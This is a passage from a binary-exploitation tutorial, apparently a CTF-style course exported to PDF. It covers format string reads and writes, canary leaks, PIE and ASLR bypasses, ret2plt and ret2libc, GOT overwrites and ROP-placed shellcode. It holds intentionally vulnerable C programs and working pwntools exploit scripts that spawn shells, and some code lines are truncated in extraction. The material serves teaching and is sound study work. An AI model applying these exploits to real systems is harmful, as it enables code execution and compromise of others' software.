The fix is simple - in your ROP chain, before the call to system , place a singular ret

ret = elf.address + 0x2439

rop.raw(0x4) # first parameter
rop.raw(ret) # align the stack

This works because it will cause RSP to be popped an additional time, pushing it
forward by 8 bytes and aligning it. 47/240
4/10/24, 12:28 PM Binary Exploitation

Format String Bug

Reading memory off the stack

Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you
can leverage it to perform powerful actions such as reading from and writing to
arbitrary memory locations.

Why it exists

In C, certain functions can take "format specifier" within strings. Let's look at an

int value = 1205;

printf("Decimal: %d\nFloat: %f\nHex: 0x%x", value, (double) value, value)

This prints out:

Decimal: 1205
Float: 1205.000000
Hex: 0x4b5

So, it replaced %d with the value, %f with the float value and %x with the hex

This is a nice way in C of formatting strings (string concatenation is quite complicated in

C). Let's try print out the same value in hex 3 times:

int value = 1205;

printf("%x %x %x", value, value, value);

As expected, we get

4b5 4b5 4b5 48/240
4/10/24, 12:28 PM Binary Exploitation

What happens, however, if we don't have enough arguments for all the format

int value = 1205;

printf("%x %x %x", value);

4b5 5659b000 565981b0

Erm... what happened here?

The key here is that printf expects as many parameters as format string specifiers,
and in 32-bit it grabs these parameters from the stack. If there aren't enough
parameters on the stack, it'll just grab the next values - essentially leaking values off
the stack. And that's what makes it so dangerous.

How to abuse this

Surely if it's a bug in the code, the attacker can't do much, right? Well the real issue is
when C code takes user-provided input and prints it out using printf .

#include <stdio.h>

int main(void) {
char buffer[30];


return 0;

If we run this normally, it works at expected: 49/240
4/10/24, 12:28 PM Binary Exploitation

$ ./test


But what happens if we input format string specifieres, such as %x ?

$ ./test

%x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520

It reads values off the stack and returns them as the developer wasn't expecting so
many format string specifiers.

Choosing Offsets

To print the same value 3 times, using

printf("%x %x %x", value, value, value);

Gets tedious - so, there is a better way in C.

printf("%1$x %1$x %1$x", value);

The 1$ between tells printf to use the first parameter. However, this also means that
attackers can read values an arbitrary offset from the top of the stack - say we know
there is a canary at the 6th %p - instead of sending %p %p %p %p %p %p we can just
do %6$p . This allows us to be much more efficient.

Arbitrary Reads

In C, when you want to use a string you use a pointer to the start of the string - this is
essentially a value that represents a memory address. So when you use the %s format 50/240
4/10/24, 12:28 PM Binary Exploitation

specifier, it's the pointer that gets passed to it. That means instead of reading a value
of the stack, you read the value in the memory address it points at.

Now this is all very interesting - if you can find a value on the stack that happens to
correspond to where you want to read, that is. But what if we could specify where we
want to read? Well... we can.

Let's look back at the previous program and its output:

$ ./test

%x %x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520 25207825

You may notice that the last two values contain the hex values of %x . That's because
we're reading the buffer. Here it's at the 4th offset - if we can write an address then
point %s at it, we can get an arbitrary write!

$ ./vuln


%p is a pointer; generally, it returns the same as %x just precedes it with a 0x which

makes it stand out more

As we can see, we're reading the value we inputted. Let's write a quick pwntools script
that write the location of the ELF file and reads it with %s - if all goes well, it should
read the first bytes of the file, which is always \x7fELF . Start with the basics: 51/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

p = process('./vuln')

payload = p32(0x41424344)
payload += b'|%6$p'


$ python3

[+] Starting local process './vuln': pid 3204

[*] b'DCBA|0x41424344'

Nice it works. The base address of the binary is 0x8048000 , so let's replace the
0x41424344 with that and read it with %s :

from pwn import *

p = process('./vuln')

payload = p32(0x8048000)
payload += b'|%6$s'


It doesn't work.

The reason it doesn't work is that printf stops at null bytes, and the very first
character is a null byte. We have to put the format specifier first.

from pwn import *

p = process('./vuln')

payload = b'%8$p||||'
payload += p32(0x8048000)

p.sendline(payload) 52/240
4/10/24, 12:28 PM Binary Exploitation

Let's break down the payload:

We add 4 | because we want the address we write to fill one memory address, not
half of one and half another, because that will result in reading the wrong address
The offset is %8$p because the start of the buffer is generally at %6$p . However,
memory addresses are 4 bytes long each and we already have 8 bytes, so it's two
memory addresses further along at %8$p .

$ python3

[+] Starting local process './vuln': pid 3255

[*] b'0x8048000||||'

It still stops at the null byte, but that's not important because we get the output;
the address is still written to memory, just not printed back.

Now let's replace the p with an s .

$ python3

[+] Starting local process './vuln': pid 3326

[*] b'\x7fELF\x01\x01\x01||||'

Of course, %s will also stop at a null byte as strings in C are terminated with them. We
have worked out, however, that the first bytes of an ELF file up to a null byte are
\x7fELF\x01\x01\x01 .

Arbitrary Writes

Luckily C contains a rarely-used format specifier %n . This specifier takes in a pointer

(memory address) and writes there the number of characters written so far. If we can
control the input, we can control how many characters are written an also where we
write them.

Obviously, there is a small flaw - to write, say, 0x8048000 to a memory address, we

would have to write that many characters - and generally buffers aren't quite that big. 53/240
4/10/24, 12:28 PM Binary Exploitation

Luckily there are other format string specifiers for that. I fully recommend you watch
this video to completely understand it, but let's jump into a basic binary.

#include <stdio.h>

int auth = 0;

int main() {
char password[100];

puts("Password: ");
fgets(password, sizeof password, stdin);

printf("Auth is %i\n", auth);

if(auth == 10) {

Simple - we need to overwrite the variable auth with the value 10. Format string
vulnerability is obvious, but there's also no buffer overflow due to a secure fgets .

Work out the location of auth

As it's a global variable, it's within the binary itself. We can check the location using
readelf to check for symbols.

$ readelf -s auth | grep auth

34: 00000000 0 FILE LOCAL DEFAULT ABS auth.c
57: 0804c028 4 OBJECT GLOBAL DEFAULT 24 auth

Location of auth is 0x0804c028 .

Writing the Exploit 54/240
4/10/24, 12:28 PM Binary Exploitation

We're lucky there's no null bytes, so there's no need to change the order.

$ ./auth

%p %p %p %p %p %p %p %p %p
0x64 0xf7f9f580 0x8049199 (nil) 0x1 0xf7ff5980 0x25207025 0x70252070 0x20

Buffer is the 7th %p .

from pwn import *

AUTH = 0x804c028

p = process('./auth')

payload = p32(AUTH)
payload += b'|' * 6 # We need to write the value 10, AUTH is 4 byt
payload += b'%7$n'


And easy peasy:

[+] Starting local process './auth': pid 4045


[*] Process './auth' stopped with exit code 0 (pid 4045)

Auth is 10


As you can expect, pwntools has a handy feature for automating %n format string
exploits: 55/240
4/10/24, 12:28 PM Binary Exploitation

payload = fmtstr_payload(offset, {location : value})

The offset in this case is 7 because the 7th %p read the buffer; the location is
where you want to write it and the value is what. Note that you can add as many
location-value pairs into the dictionary as you want.

payload = fmtstr_payload(7, {AUTH : 10})

You can also grab the location of the auth symbol with pwntools:

elf = ELF('./auth')
AUTH = elf.sym['auth']

Check out the pwntools tutorials for more cool features 56/240
4/10/24, 12:28 PM Binary Exploitation

Stack Canaries
The Buffer Overflow defence

Stack Canaries are very simple - at the beginning of the function, a random value is
placed on the stack. Before the program executes ret , the current value of that
variable is compared to the initial: if they are the same, no buffer overflow has

If they are not, the attacker attempted to overflow to control the return pointer and
the program crashes, often with a ***stack smashing detected*** error message.

On Linux, stack canaries end in 00 . This is so that they null-terminate any strings in case
you make a mistake when using print functions, but it also makes them much easier to

Bypassing Canaries
There are two ways to bypass a canary.

Leaking it

This is quite broad and will differ from binary to binary, but the main aim is to read the
value. The simplest option is using format string if it is present - the canary, like other
local variables, is on the stack, so if we can leak values off the stack it's easy.

Source 57/240
4/10/24, 12:28 PM Binary Exploitation

#include <stdio.h>

void vuln() {
char buffer[64];

puts("Leak me");


puts("Overflow me");

int main() {

void win() {
puts("You won!");

The source is very simple - it gives you a format string vulnerability, then a buffer
overflow vulnerability. The format string we can use to leak the canary value, then we
can use that value to overwrite the canary with itself. This way, we can overflow past
the canary but not trigger the check as its value remains constant. And of course, we
just have to run win() .


First let's check there is a canary: 58/240
4/10/24, 12:28 PM Binary Exploitation

$ pwn checksec vuln-32

[*] 'vuln-32'
Arch: i386-32-little
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)

Yup, there is. Now we need to calculate at what offset the canary is at, and to do this
we'll use radare2.

$ r2 -d -A vuln-32

[0xf7f2e0b0]> db 0x080491d7
[0xf7f2e0b0]> dc
Leak me
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
0xffd7cd60 0xffd7cd7c 0xffd7cdec 0x00000002 0x0804919e |...............
0xffd7cd70 0x08048034 0x00000000 0xf7f57000 0x00007025 4........p..%p..
0xffd7cd80 0x00000000 0x00000000 0x08048034 0xf7f02a28 ........4...(*..
0xffd7cd90 0xf7f01000 0xf7f3e080 0x00000000 0xf7d53ade .............:..
0xffd7cda0 0xf7f013fc 0xffffffff 0x00000000 0x080492cb ................
0xffd7cdb0 0x00000001 0xffd7ce84 0xffd7ce8c 0xadc70e00 ................

The last value there is the canary. We can tell because it's roughly 64 bytes after the
"buffer start", which should be close to the end of the buffer. Additionally, it ends in
00 and looks very random, unlike the libc and stack addresses that start with f7 and
ff . If we count the number of address it's around 24 until that value, so we go one
before and one after as well to make sure.


Leak me
%23$p %24$p %25$p
0xa4a50300 0xf7fae080 (nil)

It appears to be at %23$p . Remember, stack canaries are randomised for each new
process, so it won't be the same. 59/240
4/10/24, 12:28 PM Binary Exploitation

Now let's just automate grabbing the canary with pwntools:

from pwn import *

p = process('./vuln-32')

canary = int(p.recvline(), 16)

log.success(f'Canary: {hex(canary)}')

$ python3
[+] Starting local process './vuln-32': pid 14019
[*] b'Leak me\n'
[+] Canary: 0xcc987300

Now all that's left is work out what the offset is until the canary, and then the offset
from after the canary to the return pointer.

$ r2 -d -A vuln-32
[0xf7fbb0b0]> db 0x080491d7
[0xf7fbb0b0]> dc
Leak me
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
0xffea8af0 0x00000001 0xffea8bc4 0xffea8bcc 0xe1f91c00

We see the canary is at 0xffea8afc . A little later on the return pointer (we assume) is
at 0xffea8b0c . Let's break just after the next gets() and check what value we
overwrite it with (we'll use a De Bruijn pattern). 60/240
4/10/24, 12:28 PM Binary Exploitation

[0x080491d7]> db 0x0804920f
[0x080491d7]> dc
Overflow me
hit breakpoint at: 804920f
[0x0804920f]> pxw @ 0xffea8afc
0xffea8afc 0x41574141 0x41415841 0x5a414159 0x41614141 AAWAAXAAYAAZAAaA
0xffea8b0c 0x41416241 0x64414163 0x41654141 0x41416641 AbAAcAAdAAeAAfAA

Now we can check the canary and EIP offsets:

[0x0804920f]> wopO 0x41574141

[0x0804920f]> wopO 0x41416241

Return pointer is 16 bytes after the canary start, so 12 bytes after the canary.

from pwn import *

p = process('./vuln-32')

canary = int(p.recvline(), 16)

log.success(f'Canary: {hex(canary)}')

payload = b'A' * 64
payload += p32(canary) # overwrite canary with original value to not tri
payload += b'A' * 12 # pad to return pointer
payload += p32(0x08049245)




Same source, same approach, just 64-bit. Try it yourself before checking the solution. 61/240
4/10/24, 12:28 PM Binary Exploitation

Remember, in 64-bit format string goes to the relevant registers first and the addresses
can fit 8 bytes each so the offset may be different.

Bruteforcing the Canary

This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-

As you can expect, the general idea is to run the process loads and load of times with
random canary values until you get a hit, which you can differentiate by the presence of
a known plaintext, e.g. flag{ and this can take ages to run and is frankly not a
particularly interesting challenge. 62/240
4/10/24, 12:28 PM Binary Exploitation

Position Independent Code

PIE stands for Position Independent Executable, which means that every time you run
the file it gets loaded into a different memory address. This means you cannot
hardcode values such as function addresses and gadget locations without finding out
where they are.

Luckily, this does not mean it's impossible to exploit. PIE executables are based around
relative rather than absolute addresses, meaning that while the locations in memory
are fairly random the offsets between different parts of the binary remain constant.
For example, if you know that the function main is located 0x128 bytes in memory
after the base address of the binary, and you somehow find the location of main , you
can simply subtract 0x128 from this to get the base address and from the addresses
of everything else.

So, all we need to do is find a single address and PIE is bypassed. Where could we leak
this address from?

The stack of course!

We know that the return pointer is located on the stack - and much like a canary, we
can use format string (or other ways) to read the value off the stack. The value will
always be a static offset away from the binary base, enabling us to completely bypass
PIE! 63/240
4/10/24, 12:28 PM Binary Exploitation

Due to the way PIE randomisation works, the base address of a PIE executable will
always end in the hexadecimal characters 000 . This is because pages are the things
being randomised in memory, which have a standard size of 0x1000 . Operating
Systems keep track of page tables which point to each section of memory and define
the permissions for each section, similar to segmentation.

Checking the base address ends in 000 should probably be the first thing you do if
your exploit is not working as you expected. 64/240
4/10/24, 12:28 PM Binary Exploitation

Pwntools, PIE and ROP

As shown in the pwntools ELF tutorial, pwntools has a host of functionality that allows
you to really make your exploit dynamic. Simply setting elf.address will
automatically update all the function and symbols addresses for you, meaning you
don't have to worry about using readelf or other command line tools, but instead can
receive it all dynamically.

Not to mention that the ROP capabilities are incredibly powerful as well. 65/240
4/10/24, 12:28 PM Binary Exploitation

PIE Bypass with Given Leak

Exploiting PIE with a given leak

The Source

#include <stdio.h>

int main() {

return 0;

void vuln() {
char buffer[20];

printf("Main Function is at: %lx\n", main);


void win() {
puts("PIE bypassed! Great job :D");

Pretty simple - we print the address of main , which we can read and calculate the base
address from. Then, using this, we can calculate the address of win() itself.

Let's just run the script to make sure it's the right one :D

$ ./vuln-32
Main Function is at: 0x5655d1b9 66/240
4/10/24, 12:28 PM Binary Exploitation

Yup, and as we expected, it prints the location of main .

First, let's set up the script. We create an ELF object, which becomes very useful later
on, and start the process.

from pwn import *

elf = context.binary = ELF('./vuln-32')

p = process()

Now we want to take in the main function location. To do this we can simply receive
up until it (and do nothing with that) and then read it.

p.recvuntil('at: ')
main = int(p.recvline(), 16)

Since we received the entire line except for the address, only the address will come up
with p.recvline() .

Now we'll use the ELF object we created earlier and set its base address. The sym
dictionary returns the offsets of the functions from binary base until the base address
is set, after which it returns the absolute address in memory.

elf.address = main - elf.sym['main']

In this case, elf.sym['main'] will return 0x11b9 ; if we ran it again, it would return
0x11b9 + the base address. So, essentially, we're subtracting the offset of main from
the address we leaked to get the base of the binary.

Now we know the base we can just call win() . 67/240
4/10/24, 12:28 PM Binary Exploitation

payload = b'A' * 32
payload += p32(elf.sym['win'])



By this point, I assume you know how to find the padding length and other stuff we've
been mentioning for a while, so I won't be showing you every step of that.

And does it work?

[*] 'vuln-32'
Arch: i386-32-little
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process 'vuln-32': pid 4617
PIE bypassed! Great job :D


Final Exploit 68/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

elf = context.binary = ELF('./vuln-32')

p = process()

p.recvuntil('at: ')
main = int(p.recvline(), 16)

elf.address = main - elf.sym['main']

payload = b'A' * 32
payload += p32(elf.sym['win'])



From the leak address of main , we were able to calculate the base address of the
binary. From this we could then calculate the address of win and call it.

And one thing I would like to point out is how simple this exploit is. Look - it's 10 lines of
code, at least half of which is scaffolding and setup.

Try this for yourself first, then feel free to check the solution. Same source, same
challenge. 69/240
4/10/24, 12:28 PM Binary Exploitation

PIE Bypass
Using format string

The Source

#include <stdio.h>

void vuln() {
char buffer[20];

printf("What's your name?\n");


printf("Nice to meet you ");


puts("What's your message?");


int main() {

return 0;

void win() {
puts("PIE bypassed! Great job :D");

Unlike last time, we don't get given a function. We'll have to leak it with format strings.

Analysis 70/240
4/10/24, 12:28 PM Binary Exploitation

$ ./vuln-32

What's your name?

Nice to meet you 0xf7f6d080
What's your message?

Everything's as we expect.



As last time, first we set everything up.

from pwn import *

elf = context.binary = ELF('./vuln-32')

p = process()

PIE Leak

Now we just need a leak. Let's try a few offsets.

$ ./vuln-32
What's your name?
%p %p %p %p %p
Nice to meet you 0xf7eee080 (nil) 0x565d31d5 0xf7eb13fc 0x1

3rd one looks like a binary address, let's check the difference between the 3rd leak and
the base address in radare2. Set a breakpoint somewhere after the format string leak
(doesn't really matter where). 71/240
4/10/24, 12:28 PM Binary Exploitation

$ r2 -d -A vuln-32

Process with PID 5548 started...

= attach 5548 5548
bin.baddr 0x565ef000
0x565f01c9]> db 0x565f0234
[0x565f01c9]> dc
What's your name?
Nice to meet you 0x565f01d5

We can see the base address is 0x565ef000 and the leaked value is 0x565f01d5 .
Therefore, subtracting 0x1d5 from the leaked address should give us the binary. Let's
leak the value and get the base address.


p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)

elf.address = elf_leak - 0x11d5

log.success(f'PIE base: {hex(elf.address)}') # not required, but a nice c

Now we just need to send the exploit payload.

payload = b'A' * 32
payload += p32(elf.sym['win'])



Final Exploit 72/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

elf = context.binary = ELF('./vuln-32')

p = process()


p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)

elf.address = elf_leak - 0x11d5

log.success(f'PIE base: {hex(elf.address)}')

payload = b'A' * 32
payload += p32(elf.sym['win'])



Same deal, just 64-bit. Try it out :) 73/240
4/10/24, 12:28 PM Binary Exploitation

Address Space Layout Randomisation

ASLR stands for Address Space Layout Randomisation and can, in most cases, be
thought of as libc 's equivalent of PIE - every time you run a binary, libc (and other
libraries) get loaded into a different memory address.

While it's tempting to think of ASLR as libc PIE, there is a key difference.

ASLR is a kernel protection while PIE is a binary protection. The main difference is that
PIE can be compiled into the binary while the presence of ASLR is completely
dependant on the environment running the binary. If I sent you a binary compiled with
ASLR disabled while I did it, it wouldn't make any different at all if you had ASLR enabled.

Of course, as with PIE, this means you cannot hardcode values such as function address
(e.g. system for a ret2libc).

The Format String Trap

It's tempting to think that, as with PIE, we can simply format string for a libc address
and subtract a static offset from it. Sadly, we can't quite do that.

When functions finish execution, they do not get removed from memory; instead, they
just get ignored and overwritten. Chances are very high that you will grab one of these
remnants with the format string. Different libc versions can act very differently during
execution, so a value you just grabbed may not even exist remotely, and if it does the
offset will most likely be different (different libcs have different sizes and therefore
different offsets between functions). It's possible to get lucky, but you shouldn't really
hope that the offsets remain the same.

Instead, a more reliable way is reading the GOT entry of a specific function. 74/240
4/10/24, 12:28 PM Binary Exploitation

For the same reason as PIE, libc base addresses always end in the hexadecimal
characters 000 . 75/240
4/10/24, 12:28 PM Binary Exploitation

ASLR Bypass with Given Leak

The Source

#include <stdio.h>
#include <stdlib.h>

void vuln() {
char buffer[20];

printf("System is at: %lp\n", system);


int main() {

return 0;

void win() {
puts("PIE bypassed! Great job :D");

Just as we did for PIE, except this time we print the address of system.

$ ./vuln-32
System is at: 0xf7de5f00

Yup, does what we expected. 76/240
4/10/24, 12:28 PM Binary Exploitation

Your address of system might end in different characters - you just have a different libc

Much of this is as we did with PIE.

from pwn import *

elf = context.binary = ELF('./vuln-32')

libc = elf.libc
p = process()

Note that we include the libc here - this is just another ELF object that makes our lives

Parse the address of system and calculate libc base from that (as we did with PIE):

p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']

log.success(f'LIBC base: {hex(libc.address)}')

Now we can finally ret2libc, using the libc ELF object to really simplify it for us:

payload = flat(
'A' * 32,
0x0, # return address


p.interactive() 77/240
4/10/24, 12:28 PM Binary Exploitation

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln-32')

libc = elf.libc
p = process()

p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']

log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
'A' * 32,
0x0, # return address



Try it yourself :)

Using pwntools
If you prefer, you could have changed the following payload to be more pwntoolsy: 78/240
4/10/24, 12:28 PM Binary Exploitation

payload = flat(
'A' * 32,
0x0, # return address


Instead, you could do:

binsh = next('/bin/sh'))

rop = ROP(libc)
rop.raw('A' * 32)


The benefit of this is it's (arguably) more readable, but also makes it much easier to
reuse in 64-bit exploits as all the parameters are automatically resolved for you. 79/240
4/10/24, 12:28 PM Binary Exploitation


Bypassing ASLR

The PLT and GOT are sections within an ELF file that deal with a large portion of the
dynamic linking. Dynamically linked binaries are more common than statically linked
binary in CTFs. The purpose of dynamic linking is that binaries do not have to carry all
the code necessary to run within them - this reduces their size substantially. Instead,
they rely on system libraries (especially libc , the C standard library) to provide the
bulk of the fucntionality.
For example, each ELF file will not carry their own version of puts compiled within it -
it will instead dynamically link to the puts of the system it is on. As well as smaller
binary sizes, this also means the user can continually upgrade their libraries, instead of
having to redownload all the binaries every time a new version comes out.

So when it's on a new system, it replaces function calls with hardcoded addresses?

Not quite.

The problem with this approach is it requires libc to have a constant base address,
i.e. be loaded in the same area of memory every time it's run, but remember that ASLR
exists. Hence the need for dynamic linking. Due to the way ASLR works, these
addresses need to be resolved every time the binary is run. Enter the PLT and GOT.

The PLT and GOT

The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to
perform the linking.

When you call puts() in C and compile it as an ELF executable, it is not actually
puts() - instead, it gets compiled as puts@plt . Check it out in GDB: 80/240
4/10/24, 12:28 PM Binary Exploitation

Why does it do that?

Well, as we said, it doesn't know where puts actually is - so it jumps to the PLT entry
of puts instead. From here, puts@plt does some very specific things:

If there is a GOT entry for puts , it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.

The GOT is a massive table of addresses; these addresses are the actual locations in
memory of the libc functions. puts@got , for example, will contain the address of
puts in memory. When the PLT gets called, it reads the GOT address and redirects
execution there. If the address is empty, it coordinates with the (also called the
dynamic linker/loader) to get the function address and stores it in the GOT.

How is this useful for binary exploitation?

Well, there are two key takeaways from the above explanation:

Calling the PLT address of a function is equivalent to calling the function itself
The GOT address contains addresses of functions in libc , and the GOT is within the

The use of the first point is clear - if we have a PLT entry for a desirable libc function,
for example system , we can just redirect execution to its PLT entry and it will be the
equivalent of calling system directly; no need to jump into libc . 81/240
4/10/24, 12:28 PM Binary Exploitation

The second point is less obvious, but debatably even more important. As the GOT is
part of the binary, it will always be a constant offset away from the base. Therefore, if
PIE is disabled or you somehow leak the binary base, you know the exact address that
contains a libc function's address. If you perhaps have an arbitrary read, it's trivial to
leak the real address of the libc function and therefore bypass ASLR.

Exploiting an Arbitrary Read

There are two main ways that I (personally) exploit an arbitrary read. Note that these
approaches will cause not only the GOT entry to be return but everything else until a
null byte is reached as well, due to strings in C being null-terminated; make sure you
only take the required number of bytes.


A ret2plt is a common technique that involves calling puts@plt and passing the GOT
entry of puts as a parameter. This causes puts to print out its own address in libc .
You then set the return address to the function you are exploiting in order to call it
again and enable you to

# 32-bit ret2plt
payload = flat(
b'A' * padding,

# 64-bit
payload = flat(
b'A' * padding,
) 82/240
4/10/24, 12:28 PM Binary Exploitation

flat() packs all the values you give it with p32() and p64() (depending on context)
and concatenates them, meaning you don't have to write the packing functions out all the

%s format string

This has the same general theory but is useful when you have limited stack space or a
ROP chain would alter the stack in such a way to complicate future payloads, for
example when stack pivoting.

payload = p32(['puts']) # p64() if 64-bit

payload += b'|'
payload += b'%3$s' # The third parameter points at the st

# this part is only relevant if you need to call the function again

payload = payload.ljust(40, b'A') # 40 is the offset until you're overw

payload += p32(elf.symbols['main'])

# Send it off...

p.recvuntil(b'|') # This is not required

puts_leak = u32(p.recv(4)) # 4 bytes because it's 32-bit

The PLT and GOT do the bulk of static linking

The PLT resolves actual locations in libc of functions you use and stores them in
the GOT
Next time that function is called, it jumps to the GOT and resumes execution
Calling function@plt is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating
libc base 83/240
4/10/24, 12:28 PM Binary Exploitation

ret2plt ASLR bypass

This time around, there's no leak. You'll have to use the ret2plt technique explained
previously. Feel free to have a go before looking further on.

#include <stdio.h>

void vuln() {
puts("Come get me");

char buffer[20];

int main() {

return 0;

We're going to have to leak ASLR base somehow, and the only logical way is a ret2plt.
We're not struggling for space as gets() takes in as much data as we want.

All the basic setup 84/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

elf = context.binary = ELF('./vuln-32')

libc = elf.libc
p = process()

Now we want to send a payload that leaks the real address of puts . As mentioned
before, calling the PLT entry of a function is the same as calling the function itself; if we
point the parameter to the GOT entry, it'll print out it's actual location. This is because
in C string arguments for functions actually take a pointer to where the string can be
found, so pointing it to the GOT entry (which we know the location of) will print it out.

p.recvline() # just receive the first output

payload = flat(
'A' * 32,

But why is there a main there? Well, if we set the return address to random jargon,
we'll leak libc base but then it'll crash; if we call main again, however, we essentially
restart the binary - except we now know libc base so this time around we can do a


puts_leak = u32(p.recv(4))

Remember that the GOT entry won't be the only thing printed - puts , and most
functions in C, print until a null byte. This means it will keep on printing GOT
addresses, but the only one we care about is the first one, so we grab the first 4 bytes
and use u32() to interpret them as a little-endian number. After that we ignore the
the rest of the values as well as the Come get me from calling main again.

From here, we simply calculate libc base again and perform a basic ret2libc: 85/240
4/10/24, 12:28 PM Binary Exploitation

libc.address = puts_leak - libc.sym['puts']

log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
'A' * 32,
libc.sym['exit'], # exit is not required here, it's just n



And bingo, we have a shell!

Final Exploit 86/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

elf = context.binary = ELF('./vuln-32')

libc = elf.libc
p = process()


payload = flat(
'A' * 32,


puts_leak = u32(p.recv(4))

libc.address = puts_leak - libc.sym['puts']

log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
'A' * 32,



You know the drill - try the same thing for 64-bit. If you want, you can use pwntools'
ROP capabilities - or, to make sure you understand calling conventions, be daring and
do both :P 87/240
4/10/24, 12:28 PM Binary Exploitation

GOT Overwrite
Hijacking functions

You may remember that the GOT stores the actual locations in libc of functions.
Well, if we could overwrite an entry, we could gain code execution that way. Imagine
the following code:

char buffer[20];

Not only is there a buffer overflow and format string vulnerability here, but say we
used that format string to overwrite the GOT entry of printf with the location of
system . The code would essentially look like the following:

char buffer[20];

Bit of an issue? Yes. Our input is being passed directly to system . 88/240
4/10/24, 12:28 PM Binary Exploitation

Exploiting a GOT overwrite


The very simplest of possible GOT-overwrite binaries.

#include <stdio.h>

void vuln() {
char buffer[300];

while(1) {
fgets(buffer, sizeof(buffer), stdin);


int main() {

return 0;

Infinite loop which takes in your input and prints it out to you using printf - no buffer
overflow, just format string. Let's assume ASLR is disabled - have a go yourself :)

As per usual, set it all up 89/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')

libc = elf.libc
libc.address = 0xf7dc2000 # ASLR disabled

p = process()

Now, to do the %n overwrite, we need to find the offset until we start reading the

$ ./got_overwrite

%p %p %p %p %p %p
0x12c 0xf7fa7580 0x8049191 0x340 0x25207025 0x70252070

Looks like it's the 5th.



Yes it is!

payload = fmtstr_payload(5, {['printf'] : libc.sym['system']})




Now, next time printf gets called on your input it'll actually be system !

If the buffer is restrictive, you can always send /bin/sh to get you into a shell and run
longer commands.

Final Exploit 90/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')

libc = elf.libc
libc.address = 0xf7dc2000 # ASLR disabled

p = process()

payload = fmtstr_payload(5, {['printf'] : libc.sym['system']})





You'll never guess. That's right! You can do this one by yourself.

ASLR Enabled
If you want an additional challenge, re-enable ASLR and do the 32-bit and 64-bit
exploits again; you'll have to leverage what we've covered previously. 91/240
4/10/24, 12:28 PM Binary Exploitation

Relocation Read-Only

RELRO is a protection to stop any GOT overwrites from taking place, and it does so very
effectively. There are two types of RELRO, which are both easy to understand.

Partial RELRO

Partial RELRO simply moves the GOT above the program's variables, meaning you can't
overflow into the GOT. This, of course, does not prevent format string overwrites.


Full RELRO makes the GOT completely read-only, so even format string exploits cannot
overwrite it. This is not the default in binaries due to the fact that it can make it take
much longer to load as it need to resolve all the function addresses at once. 92/240
4/10/24, 12:28 PM Binary Exploitation

Reliable Shellcode
Shellcode, but without the guesswork

Utilising ROP
The problem with shellcode exploits as they are is that the locations of it are
questionable - wouldn't it be cool if we could control where we wrote it to?

Well, we can.

Instead of writing shellcode directly, we can instead use some ROP to take in input
again - except this time, we specify the location as somewhere we control.

Using ESP
If you think about it, once the return pointer is popped off the stack ESP will points at
whatever is after it in memory - after all, that's the entire basis of ROP. But what if we
put shellcode there?

It's a crazy idea. But remember, ESP will point there. So what if we overwrite the return
pointer with a jmp esp gadget! Once it gets popped off, ESP will point at the
shellcode and thanks to the jmp esp it will be executed!

ret2reg extends the use of jmp esp to the use of any register that happens to point
somewhere you need it to. 93/240
4/10/24, 12:28 PM Binary Exploitation

ROP and Shellcode


#include <stdio.h>

void vuln() {
char buffer[20];

puts("Give me the input");


int main() {

return 0;

Super standard binary.

Let's get all the basic setup done.

from pwn import *

elf = context.binary = ELF('./vuln-32')

p = process()

Now we're going to do something interesting - we are going to call gets again. Most
importantly, we will tell gets to write the data it receives to a section of the binary.
We need somewhere both readable and writeable, so I choose the GOT. We pass a GOT 94/240
4/10/24, 12:28 PM Binary Exploitation

entry to gets , and when it receives the shellcode we send it will write the shellcode
into the GOT. Now we know exactly where the shellcode is. To top it all off, we set the
return address of our call to gets to where we wrote the shellcode, perfectly
executing what we just inputted.

rop = ROP(elf)

rop.raw('A' * 32)
rop.gets(['puts']) # Call gets, writing to the GOT entry of p
rop.raw(['puts']) # now our shellcode is written there, we c




Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln-32')

p = process()

rop = ROP(elf)

rop.raw('A' * 32)
rop.gets(['puts']) # Call gets, writing to the GOT entry of p
rop.raw(['puts']) # now our shellcode is written there, we c




64-bit 95/240
4/10/24, 12:28 PM Binary Exploitation

I wonder what you could do with this.

No need to worry about ASLR! Neither the stack nor libc is used, save for the ROP.

The real problem would be if PIE was enabled, as then you couldn't call gets as the
location of the PLT would be unknown without a leak - same problem with writing to
the GOT.

Potential Problems
Thank to clubby789 and Faith from the HackTheBox Discord server, I found out that
the GOT often has Executable permissions simply because that's the default
permissions when there's no NX. If you have a more recent kernel, such as 5.9.0 , the
default is changed and the GOT will not have X permissions.

As such, if your exploit is failing, run uname -r to grab the kernel version and check if
it's 5.9.0 ; if it is, you'll have to find another RWX region to place your shellcode (if it
exists!). 96/240
4/10/24, 12:28 PM Binary Exploitation

Using RSP


#include <stdio.h>

int test = 0;

int main() {
char input[100];

puts("Get me with shellcode and RSP!");


if(test) {
asm("jmp *%rsp");
return 0;
else {
return 0;

You can ignore most of it as it's mostly there to accomodate the existence of jmp rsp
- we don't actually want it called, so there's a negative if statement.

